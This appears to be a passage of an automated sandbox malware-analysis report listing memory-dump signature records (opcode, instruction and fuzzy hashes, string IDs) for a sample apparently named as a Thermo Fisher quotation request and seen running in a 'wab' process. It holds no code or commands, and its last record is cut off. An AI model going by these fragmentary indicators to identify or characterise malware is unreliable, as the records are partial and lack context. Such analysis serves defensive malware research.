                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                              • Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
                                              • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                              • Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 74/$7d/$7p/
                                              • API String ID: 0-3942575134
                                              • Opcode ID: 95cd5339288fba4d5a05c2eb5b0184586cfe48fc473699601ba6d4b4dd01f102
                                              • Instruction ID: 19807fedcedf9d763f5a5f1f2c3c8496d268e0af0f84a455f72c4fdcb7198227
                                              • Opcode Fuzzy Hash: 95cd5339288fba4d5a05c2eb5b0184586cfe48fc473699601ba6d4b4dd01f102
                                              • Instruction Fuzzy Hash: C9C32E31D1071A8ADB11EF68C8906ADF7B1FF99300F15C79AE459BB111EB70AAC5CB81
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2b559b9628e286dd23c26945673cb41364ee071ba6ebe27e91d162939467f753
                                              • Instruction ID: c390055d28856ff9b367b650a553cb566888f435cc55fb46d207e98bb864134d
                                              • Opcode Fuzzy Hash: 2b559b9628e286dd23c26945673cb41364ee071ba6ebe27e91d162939467f753
                                              • Instruction Fuzzy Hash: 97E2E931D10B1A8ADB11EF68C8945A9F7B1FF99300F11D79AE4597B121FB70AAC4CB81
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4330ee6da711517ac4433efaea4cf5f97dbe52573f6e9978b1ce639142fdf6f4
                                              • Instruction ID: 6bb5422a3b6b103d36f237a4ca26ba0bf13448923b387064d4104981791a8f47
                                              • Opcode Fuzzy Hash: 4330ee6da711517ac4433efaea4cf5f97dbe52573f6e9978b1ce639142fdf6f4
                                              • Instruction Fuzzy Hash: 2CB16D70E00309CFDB10CFA9C8957EDBBF6AF88354F149529D819EB254EBB49845CB81
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9a4d370fc3d9afd90d4297d08bd62c4f056e1a28022f91bf0654bad76a61e790
                                              • Instruction ID: 667605302a78e4811075162f113652b4c2110b471782fa91e7821d7847adf22b
                                              • Opcode Fuzzy Hash: 9a4d370fc3d9afd90d4297d08bd62c4f056e1a28022f91bf0654bad76a61e790
                                              • Instruction Fuzzy Hash: D2915B70E0030ACFDF10CFA9C9A57AEBBF6AF88344F149529E415A7294EB749845CF85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $ 9$d9$x9$ 9
                                              • API String ID: 0-2139217485
                                              • Opcode ID: 4a67aa7b1307a414d6a4f703aebcf756c7f303644946cc176d38d0fa00574700
                                              • Instruction ID: cff1fc5a49e5ad56ee3eab242dda5a414cbec5668a8ce5b12a21100127fde57c
                                              • Opcode Fuzzy Hash: 4a67aa7b1307a414d6a4f703aebcf756c7f303644946cc176d38d0fa00574700
                                              • Instruction Fuzzy Hash: 2E125D34B112868BDB159A78C49526DB2EBFBC9602F908869D046EB350CF71DD4BCBC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @;9$@;9$@;9$Db9
                                              • API String ID: 0-1621754664
                                              • Opcode ID: b77da9d3d328297b2c031c9d690b21d42b5d42d65d2291b84f60ce690a7085f0
                                              • Instruction ID: bb59da928ef25099a9c2c495386d2f3b647461bfb71bc50f2da35daee20aeb28
                                              • Opcode Fuzzy Hash: b77da9d3d328297b2c031c9d690b21d42b5d42d65d2291b84f60ce690a7085f0
                                              • Instruction Fuzzy Hash: 28719231F002199BDB19DBB5C850AAEBBF6AFC9710F148529E406A7380DF359D06CBD5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @;9$@;9$Db9
                                              • API String ID: 0-2811999511
                                              • Opcode ID: 2faa1fa4639bd57cf2bc9e3dbfcca6a9254944dd6c307bb9cde93780a7ec708e
                                              • Instruction ID: 403b6a76bf2753ee468b60e6818e40a12469d2e26111a8782e0cc12c14759a3e
                                              • Opcode Fuzzy Hash: 2faa1fa4639bd57cf2bc9e3dbfcca6a9254944dd6c307bb9cde93780a7ec708e
                                              • Instruction Fuzzy Hash: 69112932B052545FCB065F74882156E7BA7AFC5600744446AD40AD7392DE354D15C7E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [9
                                              • API String ID: 0-1309186338
                                              • Opcode ID: 40fb2becc1397cf28aaec6c7c441e5dc76d6c2297266dae6e568814e8df73cc0
                                              • Instruction ID: a5c8839e53768ed79703386148c6149c76d66fe12431b7358b286d5b3a6bf736
                                              • Opcode Fuzzy Hash: 40fb2becc1397cf28aaec6c7c441e5dc76d6c2297266dae6e568814e8df73cc0
                                              • Instruction Fuzzy Hash: 78F08275E012199FCB10DEBC98112FE77F8AB59240F108976D519E7724E232C542CBD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Db9
                                              • API String ID: 0-2290711882
                                              • Opcode ID: 7934454ec35facfca0ca5adda297d29a721279656400c97e1ba819d2b7eca706
                                              • Instruction ID: a8f50d4e0d088f061bc3568bdeb8056800e31b9a4a72c1e2c8477986971f1e65
                                              • Opcode Fuzzy Hash: 7934454ec35facfca0ca5adda297d29a721279656400c97e1ba819d2b7eca706
                                              • Instruction Fuzzy Hash: 28F0E2337002186B8F06AEA5D8419AF3BEFEBCC760B40402AF509D3310DA328D1197E4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 410964b2fa9cbaa8bc8e8d3bec4e6a63da73d87b9f5561f31bdf0bccd52c79d5
                                              • Instruction ID: d307edfa82a740176bc53c1e1fe3a3150b94ab2431e8213c53cf53de2776a41b
                                              • Opcode Fuzzy Hash: 410964b2fa9cbaa8bc8e8d3bec4e6a63da73d87b9f5561f31bdf0bccd52c79d5
                                              • Instruction Fuzzy Hash: 01F17035A002058FEB15DF68D5A4BAEB7B6FF89314F248465D80AEB390DB35DC42CB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4dce6d0413e3920157f8de2e26676962b423013cee2910d5cb082061126e4618
                                              • Instruction ID: 20d7d119d178b8fda311dc642a284be82ca73df1529a26ad36d6c536f5a98daa
                                              • Opcode Fuzzy Hash: 4dce6d0413e3920157f8de2e26676962b423013cee2910d5cb082061126e4618
                                              • Instruction Fuzzy Hash: 59B16B70E0030ACFDB10CFA8C8A57DDBBF5AF88354F249529D818EB254EBB49845CB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8519508b01f9acfdcef881a6e08937acd4dce56ef80bbb05e47f5aec0062d0c5
                                              • Instruction ID: 1faaae6c036a104f6cde01749921df841420a93ec34a44796737ede473404690
                                              • Opcode Fuzzy Hash: 8519508b01f9acfdcef881a6e08937acd4dce56ef80bbb05e47f5aec0062d0c5
                                              • Instruction Fuzzy Hash: 459168B0E0030ACFDB10CFA8C8957DEBBF6AF88304F149129E415AB294EB749845CF95
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7683452e945e0b22bb4d27a3707f6812b665e73222ea29bd3a538f7fb5699be8
                                              • Instruction ID: e91986f5d06b528850ab3923799be802d8c5b0922439a63a8a55db040e0a5d83
                                              • Opcode Fuzzy Hash: 7683452e945e0b22bb4d27a3707f6812b665e73222ea29bd3a538f7fb5699be8
                                              • Instruction Fuzzy Hash: 1C719F71A002048FEB14CFA9D894B9DB7F6FF88314F24C16AE909AB395DB709845CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 126b887eee638554281b8290a437c3d9dff2446eedf2c878ed629ed22f8ed501
                                              • Instruction ID: 8c63231ae416afa155f5bc46baa90c79c4f1804992ad6dbca669459aeb56814b
                                              • Opcode Fuzzy Hash: 126b887eee638554281b8290a437c3d9dff2446eedf2c878ed629ed22f8ed501
                                              • Instruction Fuzzy Hash: 5741B131B002198BDF25AE7494683BE77E6BBC8754F644869C406EB790EF32CC468BD1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e26de104725de5216cbcb6a573f04f2bc4c3de603d28e74bbe6287ec7a0651c7
                                              • Instruction ID: fa5e62e58427448fa78cd130160c627ede16c4faa935adc5814928de95159844
                                              • Opcode Fuzzy Hash: e26de104725de5216cbcb6a573f04f2bc4c3de603d28e74bbe6287ec7a0651c7
                                              • Instruction Fuzzy Hash: B6319E31B002168BDB259E74C4687BE77E2BB84750F694928C406EBB90EF32CC46DBD1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e85dbd4b8b914a76052b547d31b4a72402fa25db9f3aec70767d9a0bac198803
                                              • Instruction ID: 7ed55183229f99d331350818a160982def6d02bd0e5922923475a2d10b94ebe2
                                              • Opcode Fuzzy Hash: e85dbd4b8b914a76052b547d31b4a72402fa25db9f3aec70767d9a0bac198803
                                              • Instruction Fuzzy Hash: B7313C71E10319DBEB14CFA5D4627EEF7B9EF89304F108526E506E7290EB71A942CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3fa74ec3ac5623a4e80a2670d9f2ba8c493bba3d650d47c4aa51cdb573d2a550
                                              • Instruction ID: 305843d1e61dc0da3beb9dad8df015c5effa18179a368f42aa573f0c84c17f5e
                                              • Opcode Fuzzy Hash: 3fa74ec3ac5623a4e80a2670d9f2ba8c493bba3d650d47c4aa51cdb573d2a550
                                              • Instruction Fuzzy Hash: 97313C70E103199FEB14CFA4D4657AEB7BAAF89304F148525E406FB290EB719942CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0367cb16fcd2e5797862bbd7e631db7bcbbf326099d659cebb4dd9b718f59bdf
                                              • Instruction ID: 0efbf38fe35c62a906e4ac4b2f6e434c2a6107d68f817ea27f4cbe941294b8f9
                                              • Opcode Fuzzy Hash: 0367cb16fcd2e5797862bbd7e631db7bcbbf326099d659cebb4dd9b718f59bdf
                                              • Instruction Fuzzy Hash: 5A4101B0D00349DFEB10CFA9C594ADEBBF5FF48314F24842AE819AB250DB74A945CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1dd32e5062327d1abb899d3d1520c201ff526c459f3bf083ecd0f99fcfb0d7a2
                                              • Instruction ID: f9647f2e858bf8e0c7030199c3d66026a774eeee838a3c0773998cd5978b5b68
                                              • Opcode Fuzzy Hash: 1dd32e5062327d1abb899d3d1520c201ff526c459f3bf083ecd0f99fcfb0d7a2
                                              • Instruction Fuzzy Hash: 4D41DEB1D00349DFEB10CFA9C494ADEBBF5EF48314F64842AE819AB250DB75A945CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 00e52f290bb2eb53462a462a0a3617976e9c2da0ed8fa627194a48df4c7fe11f
                                              • Instruction ID: 7daeff9d0ea8fb50b031441141d263527cfef715d50490a720445e2b0b7cdee6
                                              • Opcode Fuzzy Hash: 00e52f290bb2eb53462a462a0a3617976e9c2da0ed8fa627194a48df4c7fe11f
                                              • Instruction Fuzzy Hash: 1D317131E003499BEB15CFA4C4A479EB7B6BF89304F54866AE805EB390DB719846CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83fb84eee27b26746cfa83395dcecf3e602f3789981c5b00fca84a219b60c95e
                                              • Instruction ID: 8657a0f6bdcd517989a617e98cce4e87180e7b49e53a0d2379fec5bb8c8e97e6
                                              • Opcode Fuzzy Hash: 83fb84eee27b26746cfa83395dcecf3e602f3789981c5b00fca84a219b60c95e
                                              • Instruction Fuzzy Hash: BF2182706503419BDF219B78D4A576C37BAE782715F400829E44FDBBE0D728D887CB82
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b6c52a9380b2469a49f73fd66b6bbc6b53a24ca421282f0b46eed72687b5e6f1
                                              • Instruction ID: 77bf207799e71a113a6c5033856d57e59108d4f9affb7122b0551ed860cd4176
                                              • Opcode Fuzzy Hash: b6c52a9380b2469a49f73fd66b6bbc6b53a24ca421282f0b46eed72687b5e6f1
                                              • Instruction Fuzzy Hash: 1531D6346243418BDF11DB7CC8687693769EBC1610F44097AE04FDB2A5D769D847CBD2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 563e7618a075e4311bef3f1663a1f0ca1dbce533f10a9c8e389ffda26603e7ae
                                              • Instruction ID: a753e70ce3f65b44df56b1077163b0a6776ca4554c61f1158940714827aad351
                                              • Opcode Fuzzy Hash: 563e7618a075e4311bef3f1663a1f0ca1dbce533f10a9c8e389ffda26603e7ae
                                              • Instruction Fuzzy Hash: C4213235E007099BDB18CFA4D854A9EB7B6BF85314F10862AE816FB340EB719D46CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eabfd11f7b74b6425d1de883333509ca82f1e283837d43746aaccabefe501e1e
                                              • Instruction ID: 38592beafa56a137b68046dda7eee8d4a4ac744b7c8b40466d483c4810eaea2f
                                              • Opcode Fuzzy Hash: eabfd11f7b74b6425d1de883333509ca82f1e283837d43746aaccabefe501e1e
                                              • Instruction Fuzzy Hash: 21213030E1020A9BEB05CFA4D4A479EF7B6BF89304F54C52AE805FB350DB719846CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a1280450f6d36a7b07dee7abc8e5706aeb75d1249bfb3465dc470f23082ec6f5
                                              • Instruction ID: 9e11eaaa722b8d18e322abe3e0c2feb4636824b8274ec20207e85f777fe01765
                                              • Opcode Fuzzy Hash: a1280450f6d36a7b07dee7abc8e5706aeb75d1249bfb3465dc470f23082ec6f5
                                              • Instruction Fuzzy Hash: E3214630B00214CFDB14DFB8C969AADB7F6AB89704B100468E40AEB3A0DB759D01CBA5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91534773197.000000000297D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0297D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_297d000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 707464528f79a4d72a0375f9d2b642f8032d2055083e4286922270a5719c178c
                                              • Instruction ID: 1237569af79e8249020ffa049e41b5966af67025cd64aa049fdea6b470b862f7
                                              • Opcode Fuzzy Hash: 707464528f79a4d72a0375f9d2b642f8032d2055083e4286922270a5719c178c
                                              • Instruction Fuzzy Hash: B321B075604340EFDB14DF24D984B26BB65FF84714F24C96DD84A4B246C37AD847CA72
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0432bf89ca510858e406ac297f91abd0a57c32a06865af62f725aa8be0ef4ca
                                              • Instruction ID: 232f961475bef71a694652c947065ea347cfbb16bed952441d255930b3013d65
                                              • Opcode Fuzzy Hash: b0432bf89ca510858e406ac297f91abd0a57c32a06865af62f725aa8be0ef4ca
                                              • Instruction Fuzzy Hash: 42213030E0030ADBDB19CFA4D85469EB7B6BF89314F10851AEC15FB340EB719945CB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 079abfe6ba9dff858122805ea7959260eabd1cf4aa7b3db2d1247b5602f35416
                                              • Instruction ID: b981601426595d50523c47d46df2cc86d527236cfbf2b18f93a6deabd42c654b
                                              • Opcode Fuzzy Hash: 079abfe6ba9dff858122805ea7959260eabd1cf4aa7b3db2d1247b5602f35416
                                              • Instruction Fuzzy Hash: 5D213630B00358CFDF24EB78C5257AE77BAAB89244F100468C10AEB290EF368D01CBA1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e3281c1dccaaaca7d50ece8ec17c760461e11fd9c70df88e3614eabfa9783e4
                                              • Instruction ID: 92ec289fdc7abae2a953d8631a304ee160e9105613cca6b03a321d397edcdf30
                                              • Opcode Fuzzy Hash: 2e3281c1dccaaaca7d50ece8ec17c760461e11fd9c70df88e3614eabfa9783e4
                                              • Instruction Fuzzy Hash: AC214D346202418BDF11DBBCC8A4759336AEBC5A14F505975E04FDB2A4DB29D886CBD2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 869aadf57acf9c04e58eb309ae0b20363919790ae0728de6ecd82198d175475e
                                              • Instruction ID: 98525a8dfb1ea50a98d8115dd7b06fd8461d6668da471155854e019f12232fbf
                                              • Opcode Fuzzy Hash: 869aadf57acf9c04e58eb309ae0b20363919790ae0728de6ecd82198d175475e
                                              • Instruction Fuzzy Hash: 21210730B10355CBEB24EB78D5657AE77FABB89244F100468C10AEB2A0DB368D41CB95
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 73b22056c1de04e46ecb4546e18ff0144f47901b4874abe1c55a6c4fb7e9c733
                                              • Instruction ID: aa46a900e1652e3a851e67965dfe64166cea257efaeae7f654f79d5d09e6bcdc
                                              • Opcode Fuzzy Hash: 73b22056c1de04e46ecb4546e18ff0144f47901b4874abe1c55a6c4fb7e9c733
                                              • Instruction Fuzzy Hash: 0F211430B00214CFDB54DF78C969BADB7F5AB89704B100468E40AEB3A0DB769D01CB95
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d058f2c2e5d5c3751985555013a2ff65715481d10f1c1b1071d861218e191e4e
                                              • Instruction ID: 8ebaa1d0d58b4b5b6fb3284fae3e079471e003752ab14802bc6020f00b6587c6
                                              • Opcode Fuzzy Hash: d058f2c2e5d5c3751985555013a2ff65715481d10f1c1b1071d861218e191e4e
                                              • Instruction Fuzzy Hash: 19114C30B003048BEF649A7DC46476A33A9FB86614F208979E007DF295DB66CC828BC5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48841ca2030fd73c6fbad3a80a0c0c0aeb38ea51cbd69abd7816f86462cd62a8
                                              • Instruction ID: 40f79f8384f9d57af81746b20a1add80ea2edfad840cc40654e6859ad661f051
                                              • Opcode Fuzzy Hash: 48841ca2030fd73c6fbad3a80a0c0c0aeb38ea51cbd69abd7816f86462cd62a8
                                              • Instruction Fuzzy Hash: 18117C30B043058BEF249A7CC4743BA33A9EBC6614F244979D047DB281DB66C8828BC5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8be00c74ed7163ef69e9318cf351c721fc3a2ce0fba5f6c98ac82f52151ce71
                                              • Instruction ID: 244cb38aada79d6c883088241d3d79aa44f6db1c22bcdb3144e9df61c10aa9a9
                                              • Opcode Fuzzy Hash: e8be00c74ed7163ef69e9318cf351c721fc3a2ce0fba5f6c98ac82f52151ce71
                                              • Instruction Fuzzy Hash: 3F110872F103559BCF109FB9980565E7BFAEB88660F100525D99AE3340EB38C906CBD1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d0a57d12a49ab0030811a45120ab07e5f6155af1223d5470cf88c72cc396e48
                                              • Instruction ID: 6951f6857b5edfbdb8d7cd8b31a3acc90716d14d4a4b2db649cac59eaf4e1096
                                              • Opcode Fuzzy Hash: 1d0a57d12a49ab0030811a45120ab07e5f6155af1223d5470cf88c72cc396e48
                                              • Instruction Fuzzy Hash: 46115231A013159FCB11EFB984643AE77FAEB89660F251579D409EB301E736C8828BE5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fcec8e8fa3158686c79fecf994c16702ec19f5a579e8ea8b0a84863b82ef2b6e
                                              • Instruction ID: 9d4c2e7e6a4d9fc15f2be95d7795f5aa04ec4716e88e523ec968131910dc227d
